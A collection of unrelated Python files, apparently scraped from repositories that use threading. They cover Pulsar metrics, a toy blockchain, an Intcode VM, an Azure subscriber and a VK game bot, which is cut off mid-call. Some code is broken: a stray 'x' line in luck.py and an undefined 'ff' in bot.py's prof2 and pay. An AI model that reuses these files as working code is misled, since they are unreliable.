metrics_data = InstanceCommunication_pb2.MetricsData()
# total metrics
metrics_data.receivedTotal = int(total_received) if sys.version_info.major >= 3 else long(total_received)
metrics_data.processedSuccessfullyTotal = int(total_processed_successfully) if sys.version_info.major >= 3 else long(total_processed_successfully)
metrics_data.systemExceptionsTotal = int(total_sys_exceptions) if sys.version_info.major >= 3 else long(total_sys_exceptions)
metrics_data.userExceptionsTotal = int(total_user_exceptions) if sys.version_info.major >= 3 else long(total_user_exceptions)
metrics_data.avgProcessLatency = avg_process_latency_ms
metrics_data.lastInvocation = int(last_invocation) if sys.version_info.major >= 3 else long(last_invocation)
# 1min metrics
metrics_data.receivedTotal_1min = int(total_received_1min) if sys.version_info.major >= 3 else long(total_received_1min)
metrics_data.processedSuccessfullyTotal_1min = int(
total_processed_successfully_1min) if sys.version_info.major >= 3 else long(total_processed_successfully_1min)
metrics_data.systemExceptionsTotal_1min = int(total_sys_exceptions_1min) if sys.version_info.major >= 3 else long(
total_sys_exceptions_1min)
metrics_data.userExceptionsTotal_1min = int(total_user_exceptions_1min) if sys.version_info.major >= 3 else long(
total_user_exceptions_1min)
metrics_data.avgProcessLatency_1min = avg_process_latency_ms_1min
# get any user metrics
user_metrics = self.contextimpl.get_metrics()
for metric_name, value in user_metrics.items():
metrics_data.userMetrics[metric_name] = value
return metrics_data
def add_system_metrics(self, metric_name, value, metrics):
metrics.metrics[metric_name].count = value
metrics.metrics[metric_name].sum = value
metrics.metrics[metric_name].min = 0
metrics.metrics[metric_name].max = value
def get_function_status(self):
status = InstanceCommunication_pb2.FunctionStatus()
status.running = True
total_received = self.stats.get_total_received()
total_processed_successfully = self.stats.get_total_processed_successfully()
total_user_exceptions = self.stats.get_total_user_exceptions()
total_sys_exceptions = self.stats.get_total_sys_exceptions()
avg_process_latency_ms = self.stats.get_avg_process_latency()
last_invocation = self.stats.get_last_invocation()
status.numReceived = int(total_received) if sys.version_info.major >= 3 else long(total_received)
status.numSuccessfullyProcessed = int(total_processed_successfully) if sys.version_info.major >= 3 else long(total_processed_successfully)
status.numUserExceptions = int(total_user_exceptions) if sys.version_info.major >= 3 else long(total_user_exceptions)
status.instanceId = self.instance_config.instance_id
for ex, tm in self.stats.latest_user_exception:
to_add = status.latestUserExceptions.add()
to_add.exceptionString = ex
to_add.msSinceEpoch = tm
status.numSystemExceptions = int(total_sys_exceptions) if sys.version_info.major >= 3 else long(total_sys_exceptions)
for ex, tm in self.stats.latest_sys_exception:
to_add = status.latestSystemExceptions.add()
to_add.exceptionString = ex
to_add.msSinceEpoch = tm
status.averageLatency = avg_process_latency_ms
status.lastInvocationTime = int(last_invocation) if sys.version_info.major >= 3 else long(last_invocation)
return status
def join(self):
self.queue.put(InternalQuitMessage(True), True)
self.execution_thread.join()
self.close()
def close(self):
Log.info("Closing python instance...")
if self.producer:
self.producer.close()
if self.consumers:
for consumer in self.consumers.values():
try:
consumer.close()
except:
pass
if self.pulsar_client:
self.pulsar_client.close()
|
blockchain_test.py
|
import threading
import time
from time import sleep
from blockchain.blockchain_manager import BlockchainManager
from blockchain.block_builder import BlockBuilder
from transaction.transaction_pool import TransactionPool
# TransactionPoolの確認頻度
CHECK_INTERVAL = 10
FLAG_STOP_BLOCK_BUILD = False
def start_thread(tp, bb, bm, prev_block_hash):
t = threading.Thread(target=generate_block_with_tp , args=(tp, bb, bm, prev_block_hash))
t.start()
def generate_block_with_tp(tp, bb, bm, prev_block_hash):
t=time.time()
is_first = True # 一度目のループだけ起動直後にブロック生成を行う
print('Thread for generate_block_with_tp started!')
global FLAG_STOP_BLOCK_BUILD
while True:
if not FLAG_STOP_BLOCK_BUILD:
if time.time()-t > CHECK_INTERVAL or is_first:
result = tp.get_stored_transactions()
if result != None:
new_block = bb.generate_new_block(result, prev_block_hash)
bm.set_new_block(new_block.to_dict())
prev_block_hash = bm.get_hash(new_block.to_dict())
# ブロック生成に成功したらTransaction Poolはクリアする
index = len(result)
tp.clear_my_transactions(index)
else:
print('Transaction Pool is empty ...')
print('Current Blockchain is ... ', bm.chain)
print('Current prev_block_hash is ... ', prev_block_hash)
if is_first:
is_first = False
t=time.time()
else:
print('Thread for generate_block_with_tp is stopped now')
break
def main():
global FLAG_STOP_BLOCK_BUILD
bb = BlockBuilder()
my_genesis_block = bb.generate_genesis_block()
bm = BlockchainManager(my_genesis_block.to_dict())
tp = TransactionPool()
prev_block_hash = bm.get_hash(my_genesis_block.to_dict())
print('genesis_block_hash :' , prev_block_hash)
transaction = {
'sender': 'test1',
'recipient': 'test2',
'value' : 3
}
tp.set_new_transaction(transaction)
transaction2 = {
'sender': 'test1',
'recipient': 'test3',
'value' : 2
}
tp.set_new_transaction(transaction2)
start_thread(tp, bb, bm, prev_block_hash)
sleep(10)
transaction3 = {
'sender': 'test5',
'recipient': 'test6',
'value' : 10
}
tp.set_new_transaction(transaction3)
sleep(30)
print('Stop the Thread for generate_block_with_tp')
FLAG_STOP_BLOCK_BUILD = True
sleep(10)
FLAG_STOP_BLOCK_BUILD = False
start_thread(tp, bb, bm, prev_block_hash)
if __name__ == '__main__':
main()
|
setup_perturbed_snapshots.py
|
from multiprocessing import Queue, Process
from argparse import ArgumentParser
import ioutils
import copy
from scipy.stats import bernoulli
def worker(proc_num, queue, corpus, donor_list, donor_occuarances_map, receptor_list, word_freq, preplacement, out_dir, out_suffix):
while True:
if queue.empty():
break
year = queue.get()
print proc_num, "Creating snapshot for year", year
new_corpus = copy.copy(corpus)
n = len(donor_list)
for i in range(n):
d = donor_list[i]
perturb_word_in_corpus(new_corpus, d, donor_occuarances_map[d], receptor_list[i],
word_freq[donor_list[i]], preplacement)
print proc_num, "Write snapshot for year", year
write_snapshot(year, out_dir, out_suffix, new_corpus)
print proc_num, "Finished"
def perturb_word_in_corpus(corpus, donor, donor_occuarances, receptor, donor_count, preplacement):
data_bern = bernoulli.rvs(size=donor_count, p=preplacement)
# donor_idx = 0
for idx, p in enumerate(data_bern):
if p == 1:
corpus[donor_occuarances[idx]] = receptor
# for idx, w in enumerate(corpus):
# if w == donor:
# if data_bern[donor_idx] == 1:
# corpus[idx] = receptor
# donor_idx += 1
def write_snapshot(year, out_dir, out_suffix, corpus):
with open(out_dir + str(year) + out_suffix, 'w') as outfile:
outfile.writelines(' '.join(corpus) + "\n")
def run_parallel(workers, years, corpus, donor_list, donor_occuarances_map, receptor_list, word_freq, preplacement, out_dir, out_suffix):
queue = Queue()
for year in years:
queue.put(year)
procs = [Process(target=worker, args=[i, queue, corpus, donor_list, donor_occuarances_map, receptor_list, word_freq, preplacement, out_dir, out_suffix]) for i in range(workers)]
for p in procs:
p.start()
for p in procs:
p.join()
def read_corpus_to_list(corpus_file_path):
with open(corpus_file_path) as f:
return [word for line in f for word in line.split()]
def read_word_freq(word_freq_path):
word_count_map = {}
with open(word_freq_path) as f:
for line in f:
(key, val) = line.split()
word_count_map[key] = int(val)
return word_count_map
def get_donor_occurances(corpus, donor_list):
print "Setting donor occurances map"
donor_set = set(donor_list)
donor_occuarances_map = {}
for idx, w in enumerate(corpus):
if w in donor_set:
if w not in donor_occuarances_map:
donor_occuarances_map[w] = []
donor_occuarances_map[w].append(idx)
return donor_occuarances_map
if __name__ == "__main__":
parser = ArgumentParser("Setup perturbed snapshots from corpus")
parser.add_argument("corpus_file_path", help="path to raw data corpus")
parser.add_argument("donor_list_path", help="path to donor words")
parser.add_argument("receptor_list_path", help="path to receptor words")
parser.add_argument("word_freq_path", help="path to words freq of corpus")
parser.add_argument("out_dir", help="out directory")
parser.add_argument("out_suffix", help="suffix used to name")
parser.add_argument("--preplacement", type=float, help="success probability", default=0.1)
parser.add_argument("--workers", type=int, help="Number of processes to spawn", default=8)
parser.add_argument("--start-year", type=int, help="start year (inclusive)", default=1900)
parser.add_argument("--end-year", type=int, help="end year (inclusive)", default=1990)
parser.add_argument("--year-inc", type=int, help="year increment", default=10)
args = parser.parse_args()
years = range(args.start_year, args.end_year + 1, args.year_inc)
ioutils.mkdir(args.out_dir)
corpus = read_corpus_to_list(args.corpus_file_path)
donor_list = ioutils.load_word_list(args.donor_list_path)
donor_occuarances_map = get_donor_occurances(corpus, donor_list)
run_parallel(args.workers, years, corpus, donor_list, donor_occuarances_map,
ioutils.load_word_list(args.receptor_list_path), read_word_freq(args.word_freq_path),
args.preplacement, args.out_dir + "/", args.out_suffix)
|
semaphore.py
|
import threading
import time
sem = threading.Semaphore()
def fun1():
while True:
sem.acquire()
print(1)
sem.release()
time.sleep(0.25)
def fun2():
while True:
sem.acquire()
print(2)
sem.release()
time.sleep(0.5)
t = threading.Thread(target = fun1)
t.start()
t2 = threading.Thread(target = fun2)
t2.start()
|
main.py
|
#!/usr/bin/env python3
import operator
import sys
from queue import Queue
from threading import Thread
class Memory(list):
def __getitem__(self, index):
if index >= len(self):
self.extend([0] * (index - len(self) + 1))
return super(Memory, self).__getitem__(index)
def __setitem__(self, index, value):
if index >= len(self):
self.extend([0] * (index - len(self) + 1))
return super(Memory, self).__setitem__(index, value)
class Intcode:
def __init__(self, mem, inq, outq):
self.mem = Memory(mem)
self.pc = 0
self.rel_base = 0
self.inq = inq
self.outq = outq
self.halted = False
self.last_output = 0
def _run(self):
while not self.halted:
opcode = self.mem[self.pc]
ins = Instruction(opcode)
off = ins.run(self)
if off is None:
self.halted = True
else:
self.pc += off
def run(self):
t = Thread(target=self._run, args=())
t.start()
return t
class Instruction:
def __init__(self, opcode):
d = 10000
m3, opcode, d = opcode // d, opcode % d, d // 10
m2, opcode, d = opcode // d, opcode % d, d // 10
m1, opcode, d = opcode // d, opcode % d, d // 10
self.modes = [m1, m2, m3]
self.opcode = opcode
def load(self, m, arg):
mode = self.modes[arg]
addr = m.pc + arg + 1
if mode == 0:
return m.mem[m.mem[addr]]
elif mode == 1:
return m.mem[addr]
elif mode == 2:
return m.mem[m.rel_base + m.mem[addr]]
else:
raise Exception("Invalid parameter mode")
def store(self, m, arg, value):
mode = self.modes[arg]
addr = m.pc + arg + 1
if mode == 0:
m.mem[m.mem[addr]] = value
elif mode == 2:
m.mem[m.rel_base + m.mem[addr]] = value
else:
raise Exception("Invalid parameter mode")
def _alu(self, m, f):
a = self.load(m, 0)
b = self.load(m, 1)
self.store(m, 2, f(a, b))
return 4
def add(self, m):
return self._alu(m, operator.add)
def mul(self, m):
return self._alu(m, operator.mul)
def lt(self, m):
return self._alu(m, lambda a, b: 1 if a < b else 0)
def eq(self, m):
return self._alu(m, lambda a, b: 1 if a == b else 0)
def _jmp(self, m, f):
a = self.load(m, 0)
b = self.load(m, 1)
return b - m.pc if f(a) else 3
def jnz(self, m):
return self._jmp(m, lambda a: a)
def jz(self, m):
return self._jmp(m, lambda a: not a)
def read(self, m):
self.store(m, 0, m.inq.get())
return 2
def write(self, m):
a = self.load(m, 0)
m.outq.put(a)
m.last_output = a
return 2
def set_base(self, m):
a = self.load(m, 0)
m.rel_base += a
return 2
def halt(self, m):
return None
def run(self, m):
operations = {
1: self.add,
2: self.mul,
3: self.read,
4: self.write,
5: self.jnz,
6: self.jz,
7: self.lt,
8: self.eq,
9: self.set_base,
99: self.halt,
}
return operations[self.opcode](m)
def run_boost(mem, value):
inq = Queue()
outq = Queue()
m = Intcode(mem.copy(), inq, outq)
t = m.run()
inq.put(value)
t.join()
return outq.get()
def main(argv):
with open(argv[1], "r") as f:
mem = [int(n) for n in f.read().split(",")]
print(run_boost(mem, 1))
print(run_boost(mem, 2))
if __name__ == "__main__":
main(sys.argv)
|
luck.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import time, threading
balance = 0
lock = threading.Lock()
# 新线程执行的代码:
def loop():
print('thread %s is running...' % threading.current_thread().name)
n = 0
global balance
while n < 5:
n = n + 1
lock.acquire()
balance = balance + 1
print('thread %s >>> %s balance %d' % (threading.current_thread().name, n, balance))
lock.release()
print('thread %s ended.' % threading.current_thread().name)
print('thread %s is running...' % threading.current_thread().name)
t1 = threading.Thread(target = loop, name = 'LoopThread1')
t2 = threading.Thread(target = loop, name = 'LoopThread2')
t1.start()
t2.start()
x
t1.join()
t2.join()
print('thread %s ended.' % threading.current_thread().name)
|
thinc_worker.py
|
"""
PyTorch version: https://github.com/pytorch/examples/blob/master/mnist/main.py
TensorFlow version: https://github.com/tensorflow/tensorflow/blob/master/tensorflow/examples/tutorials/mnist/mnist.py
"""
# pip install thinc ml_datasets typer
import threading
from typing import Optional
import time
from thinc.types import FloatsXd, Floats2d
import ml_datasets
from wasabi import msg
from tqdm import tqdm
from thinc.api import registry, Model, get_current_ops
from spacy_ray.thinc_proxies import RayPeerProxy
from spacy_ray.util import set_params_proxy, divide_params
import ray
def thread_training(train_data, model):
for X, Y in train_data:
Yh, backprop = model.begin_update(X)
backprop(Yh - Y)
class ThincWorker:
"""Worker for training Thinc models with Ray.
Mostly used for development, e.g. for the mnist scripts.
"""
def __init__(self, config, i, n_workers):
config = registry.make_from_config(config)
self.i = i
self.n_workers = n_workers
self.optimizer = config["optimizer"]
self.train_data = config["train_data"]
self.dev_data = config["dev_data"]
self.thread = None
self.proxy = None
self.n_grads_used = 0
self.n_grads_discarded = 0
def get_percent_grads_used(self):
total = self.n_grads_used + self.n_grads_discarded
if total == 0:
return None
else:
return self.n_grads_used / total
def add_model(self, model):
self.model = model
for X, Y in self.train_data:
self.model.initialize(X=X, Y=Y)
break
def sync_params(self):
for key in self.proxy._owned_keys:
self.proxy.send_param(key)
def inc_grad(self, key, version, value) -> None:
assert key in self.proxy._owned_keys
if self.proxy.check_version(key, version):
self.proxy.inc_grad(key[0], key[1], value)
self.n_grads_used += 1
else:
self.n_grads_discarded += 1
def set_param(self, key, version, value) -> Optional[FloatsXd]:
return self.proxy.receive_param(key, version, value)
def set_proxy(self, workers, quorum):
worker_keys = divide_params(self.model, self.n_workers)
peer_map = {}
for peer, keys in zip(workers, worker_keys):
for key in keys:
peer_map[key] = peer
self.proxy = RayPeerProxy(
peer_map,
self.optimizer,
worker_keys[self.i],
)
set_params_proxy(self.model, self.proxy)
def train_epoch(self):
self.thread = threading.Thread(
target=thread_training, args=(self.train_data, self.model)
)
self.thread.start()
def is_running(self):
return self.thread.is_alive()
def evaluate(self):
correct = 0
total = 0
for X, Y in self.dev_data:
Yh = self.model.predict(X)
correct += (Yh.argmax(axis=1) == Y.argmax(axis=1)).sum()
total += Yh.shape[0]
return correct / total
@registry.datasets("mnist_train_batches.v1")
def get_train_data(worker_id, num_workers, batch_size):
ops = get_current_ops()
# Load the data
(train_X, train_Y), _ = ml_datasets.mnist()
shard_size = len(train_X) // num_workers
shard_start = worker_id * shard_size
shard_end = shard_start + shard_size
return list(
ops.multibatch(
batch_size,
train_X[shard_start:shard_end],
train_Y[shard_start:shard_end],
shuffle=True,
)
)
@registry.datasets("mnist_dev_batches.v1")
def get_dev_data(batch_size):
ops = get_current_ops()
_, (dev_X, dev_Y) = ml_datasets.mnist()
dev_data = ops.multibatch(batch_size, dev_X, dev_Y)
return list(dev_data)
|
test_client.py
|
import unittest
import socket
from threading import Thread
import openmath.openmath as om
from openmath.encoder import encode_bytes
from openmath.decoder import decode_bytes
from scscp.client import SCSCPClient
from scscp.server import SCSCPServerBase
from scscp import scscp
class TestClient(unittest.TestCase):
def setUp(self):
server, client = socket.socketpair()
self.client = SCSCPClient(client)
self.server = SCSCPServerBase(server, name=b'Test', version=b'none')
t = Thread(target=self.server.accept)
t.start()
self.client.connect()
t.join()
def tearDown(self):
self.client.quit()
def test_call_wait(self):
""" Test a procedure call and wait """
call = self.client.call(scscp.get_allowed_heads())
self.assertEqual(call.type, "procedure_call")
self.assertEqual(call.params, [(om.OMSymbol('option_return_object', 'scscp1'), om.OMString(True))])
self.assertEqual(call.data, om.OMApplication(om.OMSymbol('get_allowed_heads', 'scscp2'), []))
msg = decode_bytes(self.server.receive())
self.assertEqual(msg, om.OMObject(om.OMAttribution(
om.OMAttributionPairs([
(om.OMSymbol('call_id', 'scscp1'), om.OMString(call.id)),
(om.OMSymbol('option_return_object', 'scscp1'), om.OMString('True'))
]),
om.OMApplication(om.OMSymbol('procedure_call', 'scscp1'), [
om.OMApplication(om.OMSymbol('get_allowed_heads', 'scscp2'), [])])
), version='2.0'))
comp = scscp.SCSCPProcedureMessage.completed(call.id, scscp.symbol_set())
self.server.send(encode_bytes(comp.om()))
resp = self.client.wait()
self.assertEqual(resp.type, "procedure_completed")
self.assertEqual(resp.id, call.id)
self.assertEqual(resp.params, [])
self.assertEqual(resp.data, om.OMApplication(
om.OMSymbol('symbol_set', 'scscp2'),
[om.OMApplication(om.OMSymbol('CDName', 'meta'), [om.OMString('scscp1')]),
om.OMApplication(om.OMSymbol('CDName', 'meta'), [om.OMString('scscp2')])
]
))
|
subscriber.py
|
from abc import ABCMeta, abstractmethod
from azure.servicebus import Rule
from speedcamera import SpeedCamera
import azurehook
import threading
import json
import math
import time
import Queue
import random
################################################################################
################################################################################
#
# A Generic Class responsible for handling data received
# through an Azure subscription
#
################################################################################
################################################################################
class AzureSubscriber(object):
__metaclass__ = ABCMeta
def __init__(self, topicName, subscriptionName, ruleName = None, rule = None):
self.azure = azurehook.AzureHook()
self.topic = topicName
self.subscription = subscriptionName
self.ruleName = ruleName
self.rule = rule
self.isActive = False
def activate(self, timeout = 2):
self.azure.subscribe(self.topic, self.subscription)
# Create rule if given
if self.ruleName is not None and self.rule is not None:
self.azure.serviceBus.create_rule(self.topic, self.subscription, self.ruleName, self.rule)
self.azure.serviceBus.delete_rule(self.topic, self.subscription, '$Default')
self.isActive = True
self.nextCheck = threading.Event()
retries = 0
while self.isActive:
message = self.azure.getMessage(
self.topic,
self.subscription,
timeout=timeout)
# print(message.body)
# If no message was retrieved - try again later with exponential backoff
if message is None or message.body is None:
retries += 1
else:
body = json.loads(message.body)
self.onNewMessage(body)
retries = 0
# Calculate exponential backoff and sleep (may be woken up by terminate)
self.nextCheck.wait(self.__nextTimeout(retries))
def terminate(self):
self.isActive = False
self.nextCheck.set()
self.onTerminate()
def onTerminate(self):
pass
# Initially Amortized exponential backoff:
# Given by the formula: timeout(seconds) = (2^ntries / 10)
def __nextTimeout(self, ntries, maxNtries = 12):
# Define maximum timeout
if(ntries > maxNtries):
ntries = maxNtries
# if ntries == 0 -> timeout = 0.100 ms
# if ntries == 12 -> timeout = 6.66 min
return math.pow(2, ntries) / 10.
@abstractmethod
def onNewMessage(self, dic):
pass
################################################################################
################################################################################
#
# Class responsible for vehicle checks
#
################################################################################
################################################################################
class VehicleInspector(AzureSubscriber):
def __init__(self, queueSize = 0):
rule = Rule()
rule.filter_type = 'SqlFilter'
rule.filter_expression = "event = '%s'" % (SpeedCamera.EVENT_VEHICLE)
# Call super class constructor
AzureSubscriber.__init__(self, SpeedCamera.TOPIC, "VehicleInspector",
"VehicleInspectorRule", rule)
# Thread runs isVehicleStolen which processes items from queue
# (blocks until one is available)
processingThread = threading.Thread(target=self.vehicleProcessing)
# If parent thread exists this one exits too
processingThread.daemon = True
processingThread.start()
def onNewMessage(self, dic):
plate = dic['vehicle']['plate']
self.queue.put(plate, block = True, timeout = 10)
# print("Size of queue (after put) = %d" % self.queue.qsize())
# This will be killed when parent thread is killed
def vehicleProcessing(self):
# Instantiate queue
self.queue = Queue.Queue()
print("")
print("Vehicle processing started (queue size = %d)" % self.queue.qsize())
while True:
plate = self.queue.get(block = True, timeout = None)
isStolen = self.isVehicleStolen(plate)
if isStolen:
print "Vehicle with plate '%s' is stolen!!!" % plate
else:
print "Vehicle with plate '%s' is NOT stolen." % plate
# Should be called from a separate thread
def isVehicleStolen(self, plate, sleepFor = 5):
print ""
print "Processing vehicle with plate: '%s'" % plate
time.sleep(sleepFor)
return random.random() > 0.95
def onTerminate(self):
print "Killed"
print ""
print("Size of queue = %d" % self.queue.qsize())
|
bot.py
|
# -*- coding: utf-8 -*-
import vk_api
import requests
import bs4
import datetime
import random
import json
import time
import os.path
import threading
from vk_api.keyboard import VkKeyboard, VkKeyboardColor
from bot_4u.checkers import *
from bot_4u.config import *
from bot_4u.keyboards import *
from bot_4u.games import *
from bot_4u.hackgame import *
from bot_4u.texts import *
from bot_4u.work import *
from bot_4u.shop import *
from bot_4u.btcshop import *
from bot_4u.btcexchge import *
def res():
return time.strftime("%x %X", time.localtime())
users = next(os.walk("json/"))[2]
vk = vk_api.VkApi(token=token)
vk._auth_token()
def log(id, body, *args):
id = str(id)
if body != "block":
with open('log.txt', 'a', encoding='utf-8') as f:
f.writelines("\n[" + res() + "] " + id + " " + str(body) + " | Успешно!")
print("\n[" + res() + "] " + id + " " + str(body) + " | Успешно!")
else:
with open('log.txt', 'a', encoding='utf-8') as f:
f.writelines("\n[" + res() + "] " + id + " " + str(body) + " | Ошибка!")
print("\n[" + res() + "] " + id + " " + str(body) + " | Ошибка!")
def prof(id):
x = {
"id": id,
"balance": 1000,
"bank": 0,
"btc": 0.0,
"farm": 0.0,
"gpu": "",
"gpu_amount": 0,
"farmed": 0.0,
"farming": False,
"level": 1,
"exp": 0,
"nick": "",
"kwin": 0,
"klose": 0,
"mwin": 0,
"mlose": 0,
"work": "",
"wstatus": False,
"reg": res(),
"lbonus": 1623869110,
"car": "",
"phone": "",
"home": "",
"banned": "NO",
"hlevel": 1,
"hexp": 0,
"hhp": 20,
"hplvl": 1,
"hdamage": 1,
"damagelvl": 1,
"hdef": 1,
"deflvl": 1,
"pdamage": 0,
"php": 0,
"pdef": 0,
"hvpn": "",
"hcomp": "",
"hsheltr": ""
}
try:
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
except:
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(x, indent=4))
vk.method("messages.send", {"peer_id": 419760643,
"message": "💎 Новый пользователь! | vk.com/id" + str(id),
"random_id": random.randint(1, 2147483647)})
return '💬 Добро пожаловать! Я вижу ты здесь новенький, используй "хелп" для помощи и развлекайся!' \
'\n💲 А еще,держи свой бонус в размере 1000$\n\n' + prof(str(id))
return 'Ваш профиль\n\n' + \
'🔎 id: ' + str(ff["id"]) + \
'\n📋 Ник: ' + str(ff["nick"]) + \
'\n💰 Баланс: ' + str(ff["balance"]) + "$" + \
'\n💳 Банк: ' + str(ff["bank"]) + "$" + \
'\n💴 Биткоины: ' + str(round(ff["btc"],5)) + "₿" + \
'\n💼 Работа: ' + str(ff["work"]) + \
'\n' \
'\n🔑 Имущество:' \
'\n 🚗 Машина: ' + carcheck(id) + \
'\n 🏡 Дом: ' + homecheck(id) + \
'\n 📱 Телефон: ' + phonecheck(id) + \
'\n 🎞 Видеокарта: ' + farmcheck(id) + \
'\n' + prof2(id)
def prof2(id):
if id in admins or id in moders:
return '\n👔 Вы персонал: ' + ifstaff(id) + \
'\n📅 Дата регистрации: ' + str(ff["reg"]) + ver
else:
return '\n📅 Дата регистрации: ' + str(ff["reg"]) + ver
def dprof(idd):
idd = ids(idd)
with open('json/' + str(idd) + '.json') as f:
ff = json.loads(f.read())
return 'Ссылка на профиль: vk.com/id' + idd + \
'\n🔎 id: ' + str(ff["id"]) + \
'\n📋 Ник: ' + str(ff["nick"]) + \
'\n💰 Баланс: ' + str(ff["balance"]) + \
'\n💳 Банк: ' + str(ff["bank"]) + \
'\n💴 Биткоины: ' + str(ff["btc"]) + \
'\n📶 Уровень: ' + str(ff["level"]) + \
'\n💡 Опыт: ' + str(ff["exp"]) + \
'\n👔 Персонал: ' + ifstaff(int(idd)) + \
'\n' \
'\n🔑 Имущество:' \
'\n 🚗 Машина: ' + carcheck(idd) + \
'\n 🏡 Дом: ' + homecheck(idd) + \
'\n 📱 Телефон: ' + phonecheck(idd) + \
'\n 🎞 Видеокарта: ' + farmcheck(idd) + \
'\n' \
'\n⛔ Блокировка: ' + profbancheck(idd) + \
'\n📅 Дата регистрации: ' + str(ff["reg"])
def giveban(id,idd,rsn):
idd = ids(idd)
path = "json/"
f=os.listdir(path)
for i in range (len(f)):
f[i] = str(f[i][:-5])
if idd in f:
with open('json/' + str(idd) + '.json') as f:
ff = json.loads(f.read())
if ff["banned"] == "NO":
s = str(id) + " " + rsn
ff["banned"] = s
with open('json/' + str(idd) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
vk.method("messages.send", {"peer_id": idd,
"message": "⚠ Вы были заблокированы по причине: " + rsn + "\nЕсли не согласны с баном,напишите в репорт",
"random_id": random.randint(1, 2147483647)})
return "Пользователь успешно заблокирован!"
else:
return "Пользователь уже забанен!"
else:
return "Такого пользователя не существует!"
def unban(idd):
idd = ids(idd)
path = "json/"
f=os.listdir(path)
for i in range (len(f)):
f[i] = str(f[i][:-5])
if idd in f:
with open('json/' + str(idd) + '.json') as f:
ff = json.loads(f.read())
if ff["banned"] != "NO":
ff["banned"] = "NO"
with open('json/' + str(idd) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
vk.method("messages.send", {"peer_id": idd,
"message": "Поздравляю!🎉 Вы были разблокированы!",
"random_id": random.randint(1, 2147483647)})
return "Пользователь успешно разблокирован!"
else:
return "Пользователь не имеет блокировки"
else:
return "Такого пользователя не существует!"
def nick(id, nick):
if len(nick) <= 15:
with open('json/' + str(id) + '.json', encoding='utf-8') as f:
ff = json.loads(f.read())
ff["nick"] = nick
with open('json/' + str(id) + '.json', 'w', encoding='utf-8') as f:
f.write(json.dumps(ff, indent=4))
return "Теперь ваш ник: " + nick
else:
return "Ваш ник больше 15 символов!"
def dnick(id, nick):
if len(nick) <= 15:
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
ff["nick"] = nick
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Ник " + id + " теперь: " + str(ff["nick"])
else:
return "Ник больше 15 символов!"
def clvl (id, val):
if int(val) >= 1 and int(val) <= 5:
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
try:
ff["level"] = int(val)
except:
return "Введите целое число!"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Теперь у вас " + str(ff["level"]) + " уровень"
else:
return "Вы ввели значение меньше 1 или больше 5"
def cexp (id, val):
if int(val) >= 0 and int(val) <= 500:
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
try:
ff["exp"] = int(val)
except:
return "Введите целое число!"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Теперь у вас " + str(ff["exp"]) + " опыта"
else:
return "Вы ввели значение меньше 1 или больше 5"
def bank(id, type, amount):
with open('json/' + str(id) + '.json', encoding='utf-8') as f:
ff = json.loads(f.read())
if type == "положить" and amount == "все" or amount == "всё":
amount = ff["balance"]
if type == "снять" and amount == "все" or amount == "всё":
amount = ff["bank"]
if type == "положить" and amount == "половину":
amount = int(ff["balance"] / 2)
if type == "снять" and amount == "половину":
amount = int(ff["bank"] / 2)
if int(amount) > 0 and int(amount) <= ff["balance"] and type == "положить":
ff["balance"] -= int(amount)
ff["bank"] += int(amount)
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы успешно положили " + str(amount) + "$ в банк!"
elif int(amount) > 0 and int(amount) <= ff["bank"] and type == "снять":
ff["balance"] += int(amount)
ff["bank"] -= int(amount)
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Вы успешно сняли " + str(amount) + "$ со счёта!"
else:
return "Сумма превышает баланс или меньше 0\n" + bal(id)
def bal(id):
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
return '💰Ваш баланс: ' + str(ff["balance"]) + "$\n💴 Биткоины: " + str(round(ff["btc"],5)) + " ₿"
def cbal(id,val):
if int(val) >= 0 and int(val) <= 1000000:
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
try:
ff["balance"] = int(val)
except:
return "Введите целое число!"
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Теперь ваш баланс: " + str(ff["balance"])
else:
return "Вы ввели значение меньше нуля или больше 1 000 000"
def dbal (idd,val):
idd = ids(idd)
if int(val) >= 0 and int(val) <= 1000000000:
with open('json/' + str(idd) + '.json') as f:
ff = json.loads(f.read())
try:
ff["balance"] = int(val)
except:
return "Введите целое число!"
with open('json/' + str(idd) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Теперь баланс " + idd + ": " + str(ff["balance"])
else:
return "Вы ввели значение меньше нуля или больше 1 000 000 000"
def cbtc (id, val):
if float(val) >= 0 and float(val) <= 5000:
with open('json/' + str(id) + '.json') as f:
ff = json.loads(f.read())
ff["btc"] = round(float(val),5)
with open('json/' + str(id) + '.json', 'w') as f:
f.write(json.dumps(ff, indent=4))
return "Теперь у вас " + str(ff["btc"]) + "₿"
else:
return "Вы ввели значение меньше нуля или больше 5000"
def pay(id, idd, val):
idd = ids(idd)
if str(id) == str(idd):
return "🙃 Нельзя переводить самому себе!"
with open('json/' + str(id) + '.json', encoding='utf-8') as f:
per = json.loads(f.read())
try:
with open('json/' + str(idd) + '.json', encoding='utf-8') as f:
pol = json.loads(f.read())
except:
return "Такого пользователя не существует!"
if int(val) > 0 and int(val) <= per["balance"]:
per["balance"] -= int(val)
pol["balance"] += int(val)
with open('json/' + str(id) + '.json', 'w', encoding='utf-8') as f:
f.write(json.dumps(per, indent=4))
with open('json/' + str(idd) + '.json', 'w', encoding='utf-8') as f:
f.write(json.dumps(pol, indent=4))
if per["nick"] != '':
vk.method("messages.send", {"peer_id": idd,
"message": "💎 | Вы получили перевод от " + "@id" + str(id) + " (" + ff["nick"] + ")" + " в размере: " + val + "$",
"random_id": random.randint(1, 2147483647)})
else:
user = vk.method("users.get", {"user_ids": id})
vk.method("messages.send", {"peer_id": idd,
